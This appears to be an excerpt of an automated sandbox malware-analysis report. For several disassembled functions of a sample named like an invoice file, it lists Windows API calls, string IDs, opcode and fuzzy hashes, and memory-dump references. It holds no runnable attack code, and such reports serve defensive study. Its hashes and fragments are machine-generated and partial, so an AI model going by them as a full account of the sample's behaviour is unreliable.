                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FullNamePath_memmove_wcscat
                                          • String ID: SL
                                          • API String ID: 257928180-181245872
                                          • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                          • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                                          • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                          • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                                          Function 00458E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: 9946c7197ab10ad9fde50dae1b7c0277909534bd518ba67c60e97b676ced7028
                                          • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                                          • Opcode Fuzzy Hash: 9946c7197ab10ad9fde50dae1b7c0277909534bd518ba67c60e97b676ced7028
                                          • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                                          Function 00468D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __fread_nolock_memmove
                                          • String ID: EA06
                                          • API String ID: 1988441806-3962188686
                                          • Opcode ID: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
                                          • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                                          • Opcode Fuzzy Hash: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
                                          • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                                          Function 00458CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: d0242bd35a47d84e43d9a51d6d7b20f2831aa5b35d47bc754fff3bab3a4422aa
                                          • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                                          • Opcode Fuzzy Hash: d0242bd35a47d84e43d9a51d6d7b20f2831aa5b35d47bc754fff3bab3a4422aa
                                          • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                                          Function 00458D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: ca68f18a7fa7c3bde14d10b92c765e559fdd9fc37852c13f41fffdb9c198d947
                                          • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                                          • Opcode Fuzzy Hash: ca68f18a7fa7c3bde14d10b92c765e559fdd9fc37852c13f41fffdb9c198d947
                                          • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                                          Function 0045C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 0045C534
                                            • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                                            • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                                            • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                                          • VariantClear.OLEAUT32(?), ref: 0045C556
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Variant$Init$ClearCopy_memmove
                                          • String ID: d}K
                                          • API String ID: 2932060187-3405784397
                                          • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                          • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                                          • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                          • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                                          Function 00464F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp
                                          • String ID: #32770
                                          • API String ID: 2292705959-463685578
                                          • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                          • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                                          • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                          • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                                          Function 0043B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                                            • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                                          • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                                          Strings
                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                          • API String ID: 3158253471-631824599
                                          • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                          • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                                          • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                          • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9